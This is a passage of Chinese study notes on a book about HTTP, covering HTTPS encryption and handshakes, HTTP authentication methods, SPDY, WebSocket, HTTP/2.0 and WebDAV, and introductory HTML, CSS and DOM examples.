 818 | SSL 是独立于 HTTP 的协议, 所以不光是 HTTP 协议, 其他运行在应用层的如 SMTP 和 Telnet 等协议均可配合 SSL 协议使用. 可以说 SSL 是当今世界上应用最为广泛的网络安全技术
 819 | 
 820 | **6.2.2 相互交换密钥的公开加密技术**
 821 | 
 822 | SSL 采用一种叫公开密钥加密 (Public-key cryptography) 的加密处理方式
 823 | 
 824 | 加密和解密都会用到密钥, 如果没有密钥则无法对密码解密. 同样, 任何人只要持有密钥就能解密. 如果密钥被攻击者获得, 那加密也就失去了意义
 825 | 
 826 | **1. 共享密钥加密的困境**
 827 | 
 828 | 加密和解密使用同一个密钥的方式叫共享密钥加密 (Common key crypto system), 也被叫做**对称密钥加密**
 829 | 
 830 | 以共享密钥方式加密时必须将密钥也发送给对方, 可酒精怎样才能安全的转交? 在互联网上转发密钥时，如果通信被监听那么密钥就可会落入攻击者之手，同时也就失去了加密的意义。另外还得设法安全地保管接收到的密钥。
 831 | 
 832 | 发送密钥就有被窃听的风险，但不发送，对方就不能解密。再说，密钥若能够安全发送，那数据也应该能安全送达。
 833 | 
 834 | **2. 使用两把密钥的公开密钥加密**
 835 | 
 836 | 公开密钥加密方式很好的解决了共享密钥加密的困难
 837 | 
 838 | 公开密钥加密使用一对**非对称**的密钥. 一把叫做私有密钥 (private key), 另一把叫公开密钥 (public key). 顾名思义, 任何密钥不能让其他人知道, 而公开密则可以随意发布, 任何人都可以获得.
 839 | 
 840 | 使用公开密钥加密方式, 发送密文的一方使用对方的公开密钥进行加密处理, 对方收到被加密的信息后, 再使用自己的私有密钥进行解密. 利用这种方式, 不需要发送用来解密的私有密钥, 也不必担心密钥被攻击者窃听而盗走
 841 | 
 842 | ![[Pasted image 20220920135726.png]]
 843 | 
 844 | **3. HTTPS 采用混色加密机制**
 845 | 
 846 | HTTPS 采用共享密钥加密和公开密钥加密两者并用的混合加密机制. 若密钥能够实现安全转换, 那么有可能会开率使用公开密钥加密来通信. 但是公开密钥与共享加密密钥相比, 其处理速度要更慢.
 847 | 
 848 | 所以应充分利用两者各自的优势, 将多种方法组合起来用于通信. 在交换密钥环节使用公开密钥加密方式, 之后的建立通信交换报文阶段使用共享密钥加密方式
 849 | 
 850 | ![[Pasted image 20220920135909.png]]
 851 | 
 852 | **4. 证明公开密钥正确性的证书**
 853 | 
 854 | 公开密钥加密方式还是存在一些问题的. 那就是无法证明公开密钥本手就是货真价实的公开密钥.
 855 | 
 856 | 比如, 正准备和某台服务器建立公开密钥加密方式下的通信时, 如何证明收到的公开密钥就是原本预想的那台服务器发行的公开密钥. 或许在公开密钥传输途中, 真正的公开密钥已被攻击者替换掉了.
 857 | 
 858 | **为了解决上述问题，可以使用由数字证书认证机构（CA，CertificateAuthority）和其相关机关颁发的公开密钥证书。**
 859 | 
 860 | 数字证书认证机构处于客户端与服务器双方都可信赖的**第三方机构**的立场上。来介绍一下数字证书认证机构的业务流程。首先，服务器的运营人员向数字证书认证机构提出公开密钥的申请。数字证书认证机构在判明提出申请者的身份之后，会对已申请的公开密钥做数字签名，然后分配这个已签名的公开密钥，并将该公开密钥放入公钥证书后绑定在一起。
 861 | 
 862 | 服务器会将这份由数字证书认证机构颁发的公钥证书发送给客户端，以进行公开密钥加密方式通信。
 863 | 
 864 | 公钥证书也可叫做数字证书或直接称为证书。接到证书的客户端可使用数字证书认证机构的公开密钥，对那张证书上的数字签名进行验证，一旦验证通过，客户端便可明确两件事：一，认证服务器的公开密钥的是真实有效的数字证书认证机构。二，服务器的公开密钥是值得信赖的。 
 865 | 
 866 | 此处认证机关的公开密钥必须安全地转交给客户端。使用通信方式时，如何安全转交是一件很困难的，因此，多数浏览器开发商发布版本时，会事先在内部植入常用认证机关的公开密钥。 
 867 | 
 868 | ![[Pasted image 20220920140428.png]]
 869 | 
 870 | **5. HTTPS 的安全通信机制**
 871 | 
 872 | 为了更好地理解 HTTPS，我们来观察一下 HTTPS 的通信步骤。
 873 | 
 874 | ![[Pasted image 20220920140516.png]]
 875 | 
 876 | 步骤 1： 客户端通过发送 **Client Hello** 报文开始 SSL通信。报文中包含客户端支持的 SSL的指定版本、加密组件（Cipher Suite）列表（所使用的加密算法及密钥长度等）。
 877 | 
 878 | 步骤 2： 服务器可进行 SSL通信时，会以 **Server Hello** 报文作为应答。和客户端一样，在报文中包含 SSL版本以及加密组件。服务器的加密组件内容是从接收到的客户端加密组件内筛选出来的。 
 879 | 
 880 | 步骤 3： 之后服务器发送 **Certificate** 报文。报文中包含公开密钥证书。
 881 | 
 882 | 步骤 4： 最后服务器发送 **Server Hello Done** 报文通知客户端，最初阶段的 SSL握手协商部分结束。 
 883 | 
 884 | 步骤 5： SSL第一次握手结束之后，客户端以 **Client Key Exchange** 报文作为回应。报文中包含通信加密中使用的一种被称为 Pre-master secret 的随机密码串。该报文已用步骤 3 中的公开密钥进行加密。 
 885 | 
 886 | 步骤 6： 接着客户端继续发送 **Change Cipher Spec** 报文。该报文会提示服务器，在此报文之后的通信会采用 Pre-master secret 密钥加密。
 887 | 
 888 | 步骤 7： 客户端发送 **Finished** 报文。该报文包含连接至今全部报文的整体校验值。这次握手协商是否能够成功，要以服务器是否能够正确解密该报文作为判定标准。 
 889 | 
 890 | 步骤 8： 服务器同样发送 **Change Cipher Spec** 报文。
 891 | 
 892 | 步骤 9： 服务器同样发送 Finished 报文。
 893 | 
 894 | 步骤 10： 服务器和客户端的 **Finished** 报文交换完毕之后，SSL连接就算建立完成。当然，通信会受到 SSL的保护。从此处开始进行应用层协议的通信，即发送 HTTP 请求。
 895 | 
 896 | 步骤 11： 应用层协议通信，即发送 HTTP 响应。
 897 | 
 898 | 步骤 12： 最后由客户端断开连接。断开连接时，发送 **close_notify** 报文。上图做了一些省略，这步之后再发送 TCP FIN 报文来关闭与 TCP的通信。 
 899 | 
 900 | **下面是对整个流程的图解。图中说明了从仅使用服务器端的公开密钥证书（服务器证书）建立 HTTPS 通信的整个过程。** 
 901 | 
 902 | ![[Pasted image 20220920140817.png]]
 903 | 
 904 | **Question: SSL 速度慢吗**
 905 | 
 906 | HTTPS 也存在一些问题，那就是当使用 SSL时，它的处理速度会变慢。
 907 | 
 908 | SSL的慢分两种。一种是指通信慢。另一种是指由于大量消耗CPU 及内存等资源，导致处理速度变慢。 
 909 | 
 910 | 和使用 HTTP 相比，网络负载可能会变慢 2 到 100 倍。除去和TCP 连接、发送 HTTP 请求 • 响应以外，还必须进行 SSL通信，因此整体上处理通信量不可避免会增加。 
 911 | 
 912 | 另一点是 SSL必须进行加密处理。在服务器和客户端都需要进行加密和解密的运算处理。因此从结果上讲，比起 HTTP 会更多地
 913 | 
 914 | 消耗服务器和客户端的硬件资源，导致负载增强。
 915 | 
 916 | 针对速度变慢这一问题，并没有根本性的解决方案，我们会使用SSL加速器这种（专用服务器）硬件来改善该问题。该硬件为SSL通信专用硬件，相对软件来讲，能够提高数倍 SSL的计算速度。仅在 SSL处理时发挥 SSL加速器的功效，以分担负载。 
 917 | 
 918 | **Question: 为什么不一直使用 HTTPS？**
 919 | 
 920 | 既然 HTTPS 那么安全可靠，那为何所有的 Web 网站不一直使用HTTPS ？
 921 | 
 922 | 其中一个原因是，因为与纯文本通信相比，加密通信会消耗更多的CPU 及内存资源。如果每次通信都加密，会消耗相当多的资源，平摊到一台计算机上时，能够处理的请求数量必定也会随之减少。 
 923 | 
 924 | 特别是每当那些访问量较多的 Web 网站在进行加密处理时，它们所承担着的负载不容小觑。在进行加密处理时，并非对所有内容都
 925 | 
 926 | 进行加密处理，而是仅在那些需要信息隐藏时才会加密，以节约资源。
 927 | 
 928 | 要进行 HTTPS 通信，证书是必不可少的。而使用的证书必须向认证机构（CA）购买。证书价格可能会根据不同的认证机构略有不同。通常，一年的授权需要数万日元（现在一万日元大约折合 600 人民币）
 929 | 
 930 | ## 第七章 确认访问用户身份的认证
 931 | 
 932 | 某些 Web 页面只想让特定的人浏览，或者干脆仅本人可见。为达到这个目标，必不可少的就是认证功能。下面我们一起来学习一下认证
 933 | 
 934 | - HTTP 使用的认证方式 
 935 | 	-   BASIC认证【基本认证】
 936 | 	-   DIGEST认证【摘要认证】
 937 | 	-   SSL客户端认证
 938 | 	-   FormBase认证【基于表单认证】
 939 | 
 940 | ### 7.1 BASIC 认证
 941 | 
 942 | BASIC 认证（基本认证）是从 HTTP/1.0 就定义的认证方式。即便是现在仍有一部分的网站会使用这种认证方式。是 Web 服务器与通信
 943 | 
 944 | 客户端之间进行的认证步骤:
 945 | 
 946 | ![[Pasted image 20220920141454.png]]
 947 | 
 948 | 步骤 1： 当请求的资源需要 BASIC 认证时，服务器会随状态码 401Authorization Required，返回带 WWW-Authenticate 首部字段的响应。该字段内包含认证的方式（BASIC） 及 Request-URI 安全域字符串（realm）。 
 949 | 
 950 | 步骤 2： 接收到状态码 401 的客户端为了通过 BASIC 认证，需要将用户 ID 及密码发送给服务器。发送的字符串内容是由用户 ID 和密码构成，两者中间以冒号（:）连接后，再经过 Base64 编码处理。 
 951 | 
 952 | 步骤 3： 接收到包含首部字段 Authorization 请求的服务器，会对认证信息的正确性进行验证。如验证通过，则返回一条包含 Request-URI资源的响应。 
 953 | 
 954 | BASIC 认证虽然采用 Base64 编码方式，但这不是加密处理。不需要任何附加信息即可对其解码。换言之，由于明文解码后就是用户 ID 和密码，在 HTTP 等非加密通信的线路上进行 BASIC 认证的过程中，如果被人窃听，被盗的可能性极高。 
 955 | 
 956 | BASIC 认证使用上不够便捷灵活，且达不到多数 Web 网站期望的安全性等级，因此它并不常用。 
 957 | 
 958 | ### 7.1 DIGEST 认证
 959 | 
 960 | 为弥补 BASIC 认证存在的弱点, 从 HTTP/1.1 起就有了 DIGEST 认证. DIGEST 认证同样使用质询/响应的方式 (challenge/response), 但不会像 BASIC 认证那样直接发送明文密码
 961 | 
 962 | 所谓质询响应方式是指，一开始一方会先发送认证要求给另一方，接着使用从另一方那接收到的质询码计算生成响应码。最后将响应码返回给对方进行认证的方式。
 963 | 
 964 | DIGEST 认证步骤:
 965 | 
 966 | ![[Pasted image 20220920141731.png]]
 967 | 
 968 | 步骤 1： 请求需认证的资源时，服务器会随着状态码 401Authorization Required，返 回带 WWW-Authenticate 首部字段的响应。
 969 | 
 970 | 该字段内包含质问响应方式认证所需的临时质询码（随机数，nonce）。 
 971 | 
 972 | 步骤 2： 接收到 401 状态码的客户端，返回的响应中包含 DIGEST 认证必须的首部字段 Authorization 信息。 
 973 | 
 974 | 步骤 3： 接收到包含首部字段 Authorization 请求的服务器，会确认认证信息的正确性。认证通过后则返回包含 Request-URI 资源的响应。 
 975 | 
 976 | 并且这时会在首部字段 Authentication-Info 写入一些认证成功的相关信息。
 977 | 
 978 | DIGEST 认证提供了高于 BASIC 认证的安全等级，但是和 HTTPS 的客户端认证相比仍旧很弱。DIGEST 认证提供防止密码被窃听的保护机制，但并不存在防止用户伪装的保护机制。 
 979 | 
 980 | DIGEST 认证和 BASIC 认证一样，使用上不那么便捷灵活，且仍达不到多数 Web 网站对高度安全等级的追求标准。因此它的适用范围也有所受限。 
 981 | 
 982 | ### 7.3 SSL 客户端认证
 983 | 
 984 | SSL 客户端认证是借由 HTTPS 的客户端证书完成认证的方式. 凭借客户端证书 (在 HTTPS 一章已讲解) 认证, 服务器可确认访问是否已登录的客户端
 985 | 
 986 | **7.3.1 SSL客户端认证的认证步骤**
 987 | 
 988 | 为达到 SSL客户端认证的目的，需要事先将客户端证书分发给客户端，且客户端必须安装此证书。 
 989 | 
 990 | 步骤 1： 接收到需要认证资源的请求，服务器会发送 CertificateRequest 报文，要求客户端提供客户端证书。
 991 | 
 992 | 步骤 2： 用户选择将发送的客户端证书后，客户端会把客户端证书信息以 Client Certificate 报文方式发送给服务器。 
 993 | 
 994 | 步骤 3： 服务器验证客户端证书验证通过后方可领取证书内客户端的公开密钥，然后开始 HTTPS 加密通信。
 995 | 
 996 | **7.3.2 SSL 客户端认证采用双因素认证**
 997 | 
 998 | 在多数情况下，SSL客户端认证不会仅依靠证书完成认证，一般会和基于表单认证（稍后讲解）组合形成一种双因素认证（Two-factor authentication）来使用
 999 | 
1000 | 所谓双因素认证就是指，认证过程中不仅需要密码这一个因素，还需要申请认证者提供其他持有信息，从而作为另一个因素，与其组合使用的认证方式。
1001 | 
1002 | 换言之，第一个认证因素的 SSL客户端证书用来认证客户端计算机，另一个认证因素的密码则用来确定这是用户本人的行为。通过双因素认证后，就可以确认是用户本人正在使用匹配正确的计算机访问服务器。 
1003 | 
1004 | ### 7.4 基于表单认证
1005 | 
1006 | 基于表单的认证方法并不是在 HTTP 协议中定义的。客户端会向服务器上的 Web 应用程序发送登录信息（Credential），按登录信息的验证结果认证。 
1007 | 
1008 | 根据 Web 应用程序的实际安装，提供的用户界面及认证方式也各不 相同。
1009 | 
1010 | 多数情况下，输入已事先登录的用户 ID（通常是任意字符串或邮件 地址）和密码等登录信息后，发送给 Web 应用程序，基于认证结果 来决定认证是否成功。
1011 | 
1012 | **7.4.1 认证多半为基于表单认证**
1013 | 
1014 | 由于使用上的便利性及安全性问题，HTTP 协议标准提供的 BASIC 认 证和 DIGEST 认证几乎不怎么使用。另外，SSL客户端认证虽然具有 高度的安全等级，但因为导入及维持费用等问题，还尚未普及。
1015 | 
1016 | 比如 SSH 和 FTP 协议，服务器与客户端之间的认证是合乎标准规范 的，并且满足了最基本的功能需求上的安全使用级别，因此这些协议的认证可以拿来直接使用。但是对于 Web 网站的认证功能能够满 足其安全使用级别的标准规范并不存在，所以只好使用由 Web 应用程序各自实现基于表单的认证方式。
1017 | 
1018 | **7.4.2 Session 管理及 Cookie 应用**
1019 | 
1020 | 基于表单认证的标准规范尚未有定论，一般会使用 Cookie 来管理 Session（会话）。
1021 | 
1022 | 基于表单认证本身是**通过**服务器端的 **Web 应用**，将客户端发送过来的用户 ID 和密码与之前登录过的信息做匹配来进行认证的。
1023 | 
1024 | 但鉴于 HTTP 是无状态协议，之前已认证成功的用户状态无法通过协 议层面保存下来。即，无法实现状态管理，因此即使当该用户下一次 继续访问，也无法区分他与其他的用户。于是我们会使用 Cookie 来 管理 Session，以弥补 HTTP 协议中不存在的状态管理功能。
1025 | 
1026 | ![[Pasted image 20220920142411.png]]
1027 | 
1028 | 步骤 1： 客户端把用户 ID 和密码等登录信息放入报文的实体部分， 通常是以 POST 方法把请求发送给服务器。而这时，会使用 HTTPS 通信来进行 HTML表单画面的显示和用户输入数据的发送。 
1029 | 
1030 | 步骤 2： 服务器会发放用以识别用户的 **Session ID**。通过验证从客户端发送过来的登录信息进行身份认证，然后把用户的认证状态与 Session ID 绑定后记录在服务器端。 
1031 | 
1032 | 向客户端返回响应时，会在首部字段 Set-Cookie 内写入 Session ID（如 PHPSESSID=028a8c…）
1033 | 
1034 | 你可以把 Session ID 想象成一种用以区分不同用户的等位号。 
1035 | 
1036 | 然而，如果 Session ID 被第三方盗走，对方就可以伪装成你的身份进行恶意操作了。因此必须防止 Session ID 被盗，或被猜出。为了做到 这点，Session ID 应使用难以推测的字符串，且服务器端也需要进行有效期的管理，保证其安全性。 
1037 | 
1038 | 另外，为减轻跨站脚本攻击（XSS）造成的损失，建议事先在 Cookie 内加上 **httponly** 属性。 
1039 | 
1040 | 步骤 3： 客户端接收到从服务器端发来的 Session ID 后，会将其作为 **Cookie** 保存在本地。下次向服务器发送请求时，浏览器会自动发送 Cookie，所以 Session ID 也随之发送到服务器。服务器端可通过验证 接收到的 Session ID 识别用户和其认证状态。 
1041 | 
1042 | 除了以上介绍的应用实例，还有应用其他不同方法的案例。 
1043 | 
1044 | 另外，不仅基于表单认证的登录信息及认证过程都无标准化的方法， 服务器端应如何保存用户提交的密码等登录信息等也没有标准化。
1045 | 
1046 | 通常，一种安全的保存方法是，先利用给密码加盐 (salt)  的方式增 加额外信息，再使用散列（hash）函数计算出散列值后保存。但是我们也经常看到直接保存明文密码的做法，而这样的做法具有导致密码泄露的风险。 
1047 | 
1048 | > salt 其实就是由服务器随机生成的一个字符串，但是要保证长度足够长，并且是真正随机生成的。然后把它和密码字符串相连接（前后都可以）生成散列值。当两个用户使用了同一个密码时，由于随机生成的 salt 值不同，对应的散列值也将 是不同的。这样一来，很大程度上减少了密码特征，攻击者也就很难利用自己手中的密码特征库进行破解。——译者注
1049 | 
1050 | ## 第八章 基于 HTTP 的功能追加协议
1051 | 
1052 | ### 8.1 消除 HTTPS 瓶颈的 SPDY
1053 | 
1054 | Google 在 2010 年发布了 SPDY（取自 SPeeDY，发音同 speedy），其开发目标旨在解决 HTTP 的性能瓶颈，缩短 Web 页面的加载时间（50%）。
1055 | 
1056 | **8.1.1 HTTP 的瓶颈**
1057 | 
1058 | 为了尽可能实时地显示这些更新的内容，服务器上一有内容更新，就需要直接把那些内容反馈到客户端的界面上。虽然看起来挺简单的，
1059 | 
1060 | 但 HTTP 却无法妥善地处理好这项任务。 
1061 | 
1062 | 使用 HTTP 协议探知服务器上是否有内容更新，就必须频繁地从客户端到服务器端进行确认。如果服务器上没有内容更新，那么就会产生徒劳的通信。
1063 | 
1064 | **8.1.2 SPDY 消除 Web 瓶颈了吗**
1065 | 
1066 | 希望使用 SPDY 时，Web 的内容端不必做什么特别改动，而 Web 浏览器及 Web 服务器都要为对应 SPDY 做出一定程度上的改动。有好几家 Web 浏览器已经针对 SPDY 做出了相应的调整。另外，Web 服务器也进行了实验性质的应用，但把该技术导入实际的 Web 网站却进展不佳。因为 SPDY 基本上只是将单个域名（ IP 地址）的通信多路复用，所以当一个 Web 网站上使用多个域名下的资源，改善效果就会受到限制。
1067 | 
1068 | SPDY 的确是一种可有效消除 HTTP 瓶颈的技术，但很多 Web 网站存在的问题并非仅仅是由 HTTP 瓶颈所导致。对 Web 本身的速度提升，还应该从其他可细致钻研的地方入手，比如改善 Web 内容的编写方式等
1069 | 
1070 | ### 8.2 使用浏览器进行全双工通信的 WebSocket
1071 | 
1072 | 利用 Ajax 和 Comet 技术进行通信可以提升 Web 的浏览速度。但问题在于通信若使用 HTTP 协议，就无法彻底解决瓶颈问题。WebSocket网络技术正是为解决这些问题而实现的一套新协议及 API。 
1073 | 
1074 | **8.2.1 WebSocket 的设计与功能**
1075 | 
1076 | WebSocket，即 Web 浏览器与 Web 服务器之间全双工通信标准。其中，WebSocket 协议由 IETF 定为标准，WebSocket API 由 W3C 定为标准。仍在开发中的 WebSocket 技术主要是为了解决 Ajax 和 Comet里 XMLHttpRequest 附带的缺陷所引起的问题。
1077 | 
1078 | **8.2.2 WebSocket协议与特点**
1079 | 
1080 | 一旦 Web 服务器与客户端之间建立起 WebSocket 协议的通信连接，之后所有的通信都依靠这个专用协议进行。通信过程中可互相发送JSON、XML、HTML或图片等任意格式的数据。 
1081 | 
1082 | 下面我们列举一下 WebSocket 协议的主要特点。
1083 | 
1084 | 1. **推送功能:** 支持由服务器向客户端推送数据的推送功能。这样，服务器可直接发送数据，而不必等待客户端的请求。 
1085 | 
1086 | 2. **减少通信量:** 只要建立起 WebSocket 连接，就希望一直保持连接状态。和 HTTP 相比，不但每次连接时的总开销减少，而且由于 WebSocket 的首部信息很小，通信量也相应减少了。
1087 | 
1088 | ### 8.3 期盼已久的 HTTP/2.0
1089 | 
1090 | 目前主流的 HTTP/1.1 标准，自 1999 年发布的 RFC2616 之后再未进行过改订。SPDY 和 WebSocket 等技术纷纷出现，很难断言 HTTP/1.1仍是适用于当下的 Web 的协议。 
1091 | 
1092 | HTTP/2.0 围绕着主要的 7 项技术进行讨论，现阶段（2012 年 8 月 13日），大都倾向于采用以下协议的技术。但是，讨论仍在持续，所以不能排除会发生重大改变的可能性。 
1093 | 
1094 | ![[Pasted image 20220920143132.png]]
1095 | 
1096 | ### 8.4 Web 服务器管理文件的 WebDAV
1097 | 
1098 | WebDAV（Web-based Distributed Authoring and Versioning，基于万维网 的分布式创作和版本控制）是一个可对 Web 服务器上的内容直接进 行文件复制、编辑等操作的分布式文件系统。它作为扩展 HTTP/1.1 的协议定义在 RFC4918。
1099 | 
1100 | 除了创建、删除文件等基本功能，它还具备文件创建者管理、文件编 辑过程中禁止其他用户内容覆盖的加锁功能，以及对文件内容修改的 版本控制功能。
1101 | 
1102 | ![[Pasted image 20220920143202.png]]
1103 | 
1104 | 使用 HTTP/1.1 的 PUT 方法和 DELETE 方法，就可以对 Web 服务器 上的文件进行**创建和删除**操作。可是出于安全性及便捷性等考虑，一 般不使用。
1105 | 
1106 | **8.5.1 扩展 HTTP/1.1 的 WebDAV**
1107 | 
1108 | 针对服务器上的资源，WebDAV 新增加了一些概念，如下所示。
1109 | 
1110 | ![[Pasted image 20220920143244.png]]
1111 | 
1112 | - 集合（Collection）：是一种统一管理多个资源的概念。以集合为单位可进行各种操作。也可实现类似集合的集合这样的叠加。 
1113 | - 资源（Resource）：把文件或集合称为资源。 
1114 | - 属性（Property）：定义资源的属性。定义以“名称 = 值”的格式执 行。 
1115 | - 锁（Lock）：把文件设置成无法编辑状态。多人同时编辑时，可 防止在同一时间进行内容写入。
1116 | 
1117 | **8.5.2 WebDAV 内新增的方法及状态码**
1118 | 
1119 | WebDAV 为实现远程文件管理，向 HTTP/1.1 中追加了以下这些方 法。
1120 | 
1121 | - PROPFIND ：获取属性 
1122 | - PROPPATCH ：修改属性 
1123 | - MKCOL ：创建集合 
1124 | - COPY ：复制资源及属性 
1125 | - MOVE ：移动资源 
1126 | - LOCK ：资源加锁 
1127 | - UNLOCK ：资源解锁
1128 | 
1129 | 为配合扩展的方法，状态码也随之扩展。 
1130 | 
1131 | - 102 Processing ：可正常处理请求，但目前是处理中状态 
1132 | - 207 Multi-Status ：存在多种状态 
1133 | - 422 Unprocessible Entity ：格式正确，内容有误 
1134 | - 423 Locked ：资源已被加锁
1135 | - 424 Failed Dependency ：处理与某请求关联的请求失败，因此不再维 
1136 | - 182 持依赖关系 
1137 | - 507 Insufficient Storage ：保存空间不足
1138 | 
1139 | WebDAV 的请求实例:
1140 | 
1141 | 下面是使用 PROPFIND 方法对 http://www.example.com/file 发起 获取属性的请求。
1142 | ```http
1143 | PROPFIND /file HTTP/1.1
1144 | Host: www.example.com
1145 | Content-Type: application/xml; charset="utf-8"
1146 | Content-Length: 219
1147 | 
1148 | <?xml version="1.0" encoding="utf-8" ?>
1149 | <D:propfind xmlns:D="DAV:">
1150 | 	<D:prop xmlns:R="http://ns.example.com/boxschema/">
1151 | 		<R:bigbox/>
1152 | 		<R:author/>
1153 | 		<R:DingALing/>
1154 | 		<R:Random/>
1155 | 	</D:prop>
1156 | </D:propfind>
1157 | ```
1158 | 
1159 | WebDAV 的响应实例:
1160 | 
1161 | 下面是针对之前的 PROPFIND 方法，返回 http://www.example.com/file 的属性的响应。
1162 | 
1163 | ```http
1164 | HTTP/1.1 207 Multi-Status
1165 | Content-Type: application/xml; charset="utf-8"
1166 | Content-Length: 831 http://www.example.com/file Box type A
1167 | 
1168 | <?xml version="1.0" encoding="utf-8" ?>
1169 | <D:multistatus xmlns:D="DAV:">
1170 | 	<D:response xmlns:R="http://ns.example.com/boxschema/">
1171 | 			<D:href>http://www.example.com/file</D:href>
1172 | 			<D:propstat>
1173 | 				<R:bigbox>
1174 | 				<R:BoxType>Box type A</R:BoxType>
1175 | 				</R:bigbox>
1176 | 				<R:author>
1177 | 				<R:Name>J.J. Johnson</R:Name>
1178 | 				</R:author>
1179 | 			</D:prop>
1180 | 			<D:status>HTTP/1.1 200 OK</D:status>
1181 | 		</D:propstat>
1182 | 		<D:propstat>
1183 | <D:prop><R:DingALing/><R:Random/></D:prop>
1184 | <D:status>HTTP/1.1 403 Forbidden</D:status>
1185 | 			<D:responsedescription> The user does not have access to the DingALing property.
1186 | 			</D:responsedescription>
1187 | 		</D:propstat>
1188 | 	</D:response>
1189 | 	<D:responsedescription> There has been an access violation error.
1190 | 	</D:responsedescription>
1191 | </D:multistatus>
1192 | ```
1193 | 
1194 | 
1195 | > 为何 HTTP 协议受众如此广泛
1196 | > 
1197 | > 本章讲解了几个与 HTTP 相关联的协议使用案例。为什么 HTTP 协 议受众能够如此广泛呢? 
1198 | > 
1199 | > 过去，新编写接入互联网的系统或软件时，还需要同时编写实现与必要功能对应的新协议。但最近，使用 HTTP 的系统和软件占了绝大多数。
1200 | > 
1201 | > 这有着诸多原因，其中与企业或组织的防火墙设定有着莫大的关系。防火墙的基本功能就是禁止非指定的协议和端口号的数据包通过。因此如果使用新协议或端口号则必须修改防火墙设置。 
1202 | > 
1203 | > 互联网上，使用率最高的当属 Web。不管是否具备访问 FTP 和 SSH 的权限，一般公司都会开放对 Web 的访问。Web 是基于 HTTP 协议运作的，因此在构建 Web 服务器或访问 Web 站点时，需事先设置防火墙 HTTP（80/tcp）和 HTTPS（443/tcp）的权限。 
1204 | > 
1205 | > 许多公司或组织已设定权限将 HTTP 作为通信环境，因此无须再修改防火墙的设定。可见 HTTP 具有导入简单这一大优势。而这也是基于 HTTP 服务或内容不断增加的原因之一。 
1206 | > 
1207 | > 还有一些其他原因，比如，作为 HTTP 客户端的浏览器已相当普遍，HTTP 服务器的数量已颇具规模，HTTP 本身就是优异的应用等。
1208 | 
1209 | ## 第九章 构建 Web 内容的技术
1210 | 
1211 | ### 9.1 HTML
1212 | 
1213 | **9.1.1 Web页面几乎全由 HTMl 构建**
1214 | 
1215 | HTML（HyperText Markup Language，超文本标记语言）是为了发送 Web 上的超文本（Hypertext）而开发的标记语言。超文本是一种文档系统，可将文档中任意位置的信息与其他信息（文本或图片等）建立关联，即超链接文本。标记语言是指通过在文档的某部分穿插特别的字符串标签，用来修饰文档的语言。我们把出现在 HTML文档内的 这种特殊字符串叫做 HTML标签（Tag）。
1216 | 
1217 | 平时我们浏览的 Web 页面几乎全是使用 HTML写成的。由 HTML构 成的文档经过浏览器的解析、渲染后，呈现出来的结果就是 Web 页 面。
1218 | 
1219 | 以下就是用 HTML编写的文档的例子。而这份 HTML文档内这种被 < > 包围着的文字就是标签。在标签的作用下，文档会改变样式，或插 入图片、链接。
1220 | 
1221 | ```html
1222 | <html>
1223 | <head>
1224 | <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
1225 | <title>hackr.jp</title>
1226 | <style type="text/css">
1227 | .logo {
1228 | 		padding: 20px;
1229 | 		text-align: center;
1230 | }
1231 | </style>
1232 | </head>
1233 | 
1234 | <body>
1235 | <div class="logo">
1236 | 		<p><img src="photo.jpg" alt="photo" width="240" height="127" /></p>
1237 | 		<p><img src="hackr.gif" alt="hackr.jp" width="240" height="84" /></p>
1238 | 		<p><a href="http://hackr.jp/">hackr.jp</a> </p>
1239 | </div>
1240 | </body>
1241 | </html>
1242 | ```
1243 | **9.1.2 HTMl 的版本**
1244 | 
1245 | 目前的最新版本是 HTML5 标准
1246 | 
1247 | HTML5 标准不仅解决了浏览器之间的兼容性问题，并且可把文本作 为数据对待，更容易复用，动画等效果也变得更生动。
1248 | 
1249 | 时至今日，HTML仍存在较多悬而未决问题。有些浏览器未遵循 HTML标准实现，或扩展自用标签等，这都反映了 HTML的标准实际 上尚未统一这一现状。
1250 | 
1251 | **9.1.3 设计应用 CSS**
1252 | 
1253 | CSS（Cascading Style Sheets，层叠样式表）可以指定如何展现 HTML 内的各种元素，属于样式表标准之一。即使是相同的 HTML文档， 通过改变应用的 CSS，用浏览器看到的页面外观也会随之改变。CSS 的理念就是让文档的结构和设计分离，达到解耦的目的。
1254 | 
1255 | CSS 实例
1256 | 
1257 | ```css
1258 | .logo {
1259 | 		padding: 20px;
1260 | 		text-align: center;
1261 | }
1262 | ```
1263 | 
1264 | 可在**选择器**（selector）`.logo` 的指定范围内，使用 {} 括起来的声明块 中写明的 `padding: 20px` 等声明语句应用指定的样式。 可通过指定 HTML元素或特定的 `class`、`ID` 等作为选择器来限定样式 的应用范围。
1265 | 
1266 | ### 9.2 动态 HTML
1267 | 
1268 | **9.2.1 让 Web 页面动起来的动态 HTMl**
1269 | 
1270 | 所谓动态 HTML（Dynamic HTML），是指使用客户端脚本语言将静态的 HTML 内容变成动态的技术的总称。鼠标单击点开的新闻、 Google Maps 等可滚动的地图就用到了动态 HTML。
1271 | 
1272 | 动态 HTML技术是通过调用客户端脚本语言 **JavaScript**，实现对 HTML的 Web 页面的动态改造。利用 DOM（Document Object Model，文档对象模型）可指定欲发生动态变化的 HTML元素。
1273 | 
1274 | **9.2.2 更易控制 HTML 的 DOM**
1275 | 
1276 | DOM 是用以操作 HTML 文档和 XML 文档的 API（Application Programming Interface，应用编程接口）。使用 DOM 可以将 HTML 内的元素当作对象操作，如取出元素内的字符串、改变那个 CSS 的属 性等，使页面的设计发生改变。
1277 | 
1278 | 通过调用 JavaScript 等脚本语言对 DOM 的操作，可以以更为简单的方式控制 HTML 的改变。
1279 | 
1280 | ```html
1281 | <body>
1282 | 		<h1>繁琐的Web安全</h1>
1283 | 		<p>第Ⅰ部分 Web的构成元素</p>
1284 | 		<p>第Ⅱ部分 浏览器的安全功能</p>
1285 | 		<p>第Ⅲ部分 接下来发生的事</p>
1286 | </body>
1287 | ```
1288 | 
1289 | 比如，从 JavaScript 的角度来看，将上述 HTML文档的第 3 个 P 元素 （P 标签）改变文字颜色时，会像下方这样编写代码。
1290 | 
1291 | ```html
1292 | <script type="text/javascript">
1293 | 		var content = document.getElementsByTagName('P'); 
1294 | 		content[2].style.color = '#FF0000';
1295 | </script>
1296 | ```
1297 | 
1298 | 1. `document.getElementsByTagName('P')` 语句调用 `getElementsByTagName` 函数,从整个 HTML文档 `(document object)` 内取出 P 元素
1299 | 2. 接下来 的 `content[2].style.color = '#FF0000'` 语句指定 `content` 的索引为 2（第 3 个）的元素的样式颜色改为红色（#FF0000）
1300 | 
1301 | DOM 内存在各种函数，使用它们可查阅 HTML中的各个元素。
1302 | 
1303 | ### 9.3 Web 应用
